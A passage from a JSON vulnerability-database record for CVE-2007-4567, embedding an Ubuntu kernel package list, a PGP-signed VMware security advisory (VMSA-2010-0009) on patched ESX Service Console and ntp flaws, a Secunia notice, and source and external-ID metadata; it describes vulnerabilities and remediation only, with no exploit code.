http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    42126 e79a1e7135eabf2d9d497eeb0ff5a063\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    95324 22b9cde814f894b66be8d5e85493b043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   594028 4e82b58f932c9b8d38db5c4d9fe3274c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   169366 6f6d29a958b09979738bb3b17040fed7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    38250 c5bb908a6b4ba4c2df0854c0547694ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    38640 ccad5e69ca054d862cdd01de9f8c3608\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   154608 309598ae61ea2055a1105eb95dd04395\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:  1992728 62f6bbcd5d90bccddf1c03bd6dc811e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb\n      Size/MD5:   475656 983165021233a6f4818f3d7df6dd480c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb\n      Size/MD5:   474000 14ab54585c4f5fe06361e10c48735c8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb\n      Size/MD5: 12414922 f8fbde5e6de9d1cfe385c521f3ff55d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb\n      Size/MD5: 12180792 cf2ad7921f617b3e85978603851d782c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_sparc.deb\n      Size/MD5:   683970 daeaffb36d535c6c5ff100446777a168\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   265804 e16972aa57e535422ec219d703fe2b0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   159904 aed2604b943ac15347285ba2ccaed7e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   247420 c13d045745e03c9e41f443ce8cda80cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:  1253996 792ab6d6a423e5a8c2f6ca51b4026140\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   159994 3cc047df902584eba563a584523744ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    91956 68fb5604af7f1f3f5c6d63a7192d4567\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    40628 101c44a6ad87402a2ce0708438e956d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    38578 b728e295a5ae24b60648fa54e9cc96c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:     8642 0f86cab5b1e20475cd33cf50d04a32f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    60062 6eb9bf4be178a0d732cf373868a6e08a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    90988 158d88a7ce2a3206abb3a789b261fc43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   875868 f92fdfed5a7b07bcb27d676e648ebf24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:     9756 c9f533a3f3ec1cc8d52930f2c59a5ee7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:   369260 3da59dbc90209256155801d4a2398135\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    56884 adc85553e31023c42ef7c8623154a9a9\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2010-0009\nSynopsis:          ESXi ntp and ESX Service Console third party updates\nIssue date:        2010-05-27\nUpdated on:        2010-05-27 (initial release of advisory)\nCVE numbers:       CVE-2009-2695 CVE-2009-2908 CVE-2009-3228\n                   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613\n                   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621\n                   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536\n                   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304\n                   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556\n                   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020\n                   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141\n                   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355\n                   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377\n                   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386\n                   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384\n                   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736\n                   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427\n                   CVE-2010-0382\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   ESXi update for ntp and ESX Console OS (COS) updates for COS\n   kernel, openssl, krb5, gcc, bind, gzip, sudo. \n\n2. Relevant releases\n\n   VMware ESX 4.0.0 without patches ESX400-201005401-SG,\n   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,\n   ESX400-201005405-SG, ESX400-201005409-SG\n\n3. Problem Description\n\n a. Service Console update for COS kernel\n\n    Updated COS package \"kernel\" addresses the security issues that are\n    fixed through versions 2.6.18-164.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n    fixed in kernel 2.6.18-164.6.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n    CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n    CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n    CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n    CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n    the security issues fixed in kernel 2.6.18-164.11.1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. ESXi userworld update for ntp\n\n    The Network Time Protocol (NTP) is used to synchronize the time of\n    a computer client or server to another server or reference time\n    source. \n\n    A vulnerability in ntpd could allow a remote attacker to cause a\n    denial of service (CPU and bandwidth consumption) by using\n    MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n    that triggers a continuous exchange of MODE_PRIVATE error responses\n    between two NTP daemons. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3563 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.0       ESXi     ESXi400-201005401-SG\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n    vMA            any       RHEL5    not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n    OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n    full-strength cryptography world-wide. \n\n    A memory leak in the zlib could allow a remote attacker to cause a\n    denial of service (memory consumption) via vectors that trigger\n    incorrect calls to the CRYPTO_cleanup_all_ex_data function. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4355 to this issue. \n\n    A vulnerability was discovered which may allow remote attackers to\n    spoof certificates by using MD2 design flaws to generate a hash\n    collision in less than brute-force time. NOTE: the scope of this\n    issue is currently limited because the amount of computation\n    required is still large. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2409 to this issue. \n\n    This update also includes security fixes that were first addressed\n    in version openssl-0.9.8e-12.el5.i386.rpm. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n    CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending**\n\n  *  hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n  ** see VMSA-2010-0004\n\n d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n    2.2.14-15. \n\n    Kerberos is a network authentication protocol. It is designed to\n    provide strong authentication for client/server applications by\n    using secret-key cryptography. \n\n    Multiple integer underflows in the AES and RC4 functionality in the\n    crypto library could allow remote attackers to cause a denial of\n    service (daemon crash) or possibly execute arbitrary code by\n    providing ciphertext with a length that is too short to be valid. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4212 to this issue. \n\n    The service console package for pam_krb5 is updated to version\n    pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n    some non-default configurations (specifically, where pam_krb5 would\n    be the first module to prompt for a password), a remote attacker\n    could use this flaw to recognize valid usernames, which would aid a\n    dictionary-based password guess attack. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-1384 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005406-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n    BIND (Berkeley Internet Name Daemon) is by far the most widely used\n    Domain Name System (DNS) software on the Internet. \n\n    A vulnerability was discovered which could allow remote attacker to\n    add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n    for an existing domain. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0097 to this issue. \n\n    A vulnerability was discovered which could allow remote attackers\n    to conduct DNS cache poisoning attacks by receiving a recursive\n    client query and sending a response that contains CNAME or DNAME\n    records, which do not have the intended validation before caching. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0290 to this issue. \n\n    A vulnerability was found in the way that bind handles out-of-\n    bailiwick data accompanying a secure response without re-fetching\n    from the original source, which could allow remote attackers to\n    have an unspecified impact via a crafted response. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0382 to this issue. \n\n    NOTE: ESX does not use the BIND name service daemon by default. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005408-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n f. Service Console package gcc updated to 3.2.3-60\n\n    The GNU Compiler Collection includes front ends for C, C++,\n    Objective-C, Fortran, Java, and Ada, as well as libraries for these\n    languages\n\n    GNU Libtool\u0027s ltdl.c attempts to open .la library files in the\n    current working directory.  This could allow a local user to gain\n    privileges via a Trojan horse file.  The GNU C Compiler collection\n    (gcc) provided in ESX contains a statically linked version of the\n    vulnerable code, and is being replaced. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3736 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-201005407-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. Service Console package gzip update to 1.3.3-15.rhel3\n\n    gzip is a software application used for file compression\n\n    An integer underflow in gzip\u0027s unlzw function on 64-bit platforms\n    may allow a remote attacker to trigger an array index error\n    leading to a denial of service (application crash) or possibly\n    execute arbitrary code via a crafted LZW compressed file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0001 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005405-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n    Sudo (su \"do\") allows a system administrator to delegate authority\n    to give certain users (or groups of users) the ability to run some\n    (or all) commands as root or another user while providing an audit\n    trail of the commands and their arguments. \n\n    When a pseudo-command is enabled, sudo permits a match between the\n    name of the pseudo-command and the name of an executable file in an\n    arbitrary directory, which allows local users to gain privileges\n    via a crafted executable file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0426 to this issue. \n\n    When the runas_default option is used, sudo does not properly set\n    group memberships, which allows local users to gain privileges via\n    a sudo command. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0427 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005409-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX 4.0\n   -------\n   http://bit.ly/aqTCqn\n   md5sum: ace37cd8d7c6388edcea2798ba8be939\n   sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78\n   http://kb.vmware.com/kb/1013127\n\n   Note ESX400-201005001 contains the following security bulletins\n   ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip),\n   ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl),\n   ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE),\n   ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo),\n   ESX400-201005407-SG (gcc). \n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-05-27  VMSA-2010-0009\nInitial security advisory after release of patch 06 bulletins for ESX\n4.0 on 2010-05-27\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW\nE70An2gfkiCQ5FNqvf3y+kNredxyVZwI\n=JW3s\n-----END PGP SIGNATURE-----\n. ----------------------------------------------------------------------\n\n\n\nAccurate Vulnerability Scanning\nNo more false positives, no more false negatives\n\nhttp://secunia.com/vulnerability_scanning/\n\n\n\n----------------------------------------------------------------------\n\nTITLE:\nRed Hat update for the kernel\n\nSECUNIA ADVISORY ID:\nSA38015\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/38015/\n\nDESCRIPTION:\nRed Hat has issued an update for the kernel. \nhttp://rhn.redhat.com\n\nORIGINAL ADVISORY:\nRHSA-2010:0019-1:\nhttps://rhn.redhat.com/errata/RHSA-2010-0019.html\n\nOTHER REFERENCES:\nSA25505:\nhttp://secunia.com/advisories/25505/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "PACKETSTORM",
        "id": "61952"
      },
      {
        "db": "PACKETSTORM",
        "id": "61991"
      },
      {
        "db": "PACKETSTORM",
        "id": "63233"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "85224"
      },
      {
        "db": "PACKETSTORM",
        "id": "63291"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-27929",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30902",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-4567",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "26943",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "38015",
        "trust": 2.7
      },
      {
        "db": "SECUNIA",
        "id": "25505",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "28170",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "28706",
        "trust": 1.9
      },
      {
        "db": "XF",
        "id": "39171",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30902",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-84260",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-27929",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "61952",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "61991",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "63233",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "90046",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85224",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "63291",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-4567"
      },
      {
        "db": "BID",
        "id": "26943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001202"
      },
      {
        "db": "PACKETSTORM",
        "id": "61952"
      },
      {
        "db": "PACKETSTORM",
        "id": "61991"
      },
      {
        "db": "PACKETSTORM",
        "id": "63233"
      },
      {
        "db": "PACKETSTORM",
        "id": "90046"
      },
      {
        "db": "PACKETSTORM",
        "id": "85224"
      },
      {
        "db": "PACKETSTORM",
        "id": "63291"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-4567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-303"
      }
    ]
  },
  "id": "VAR-200712-0602",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27929"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:31:19.695000Z",
  "patch": {
    "@context": {
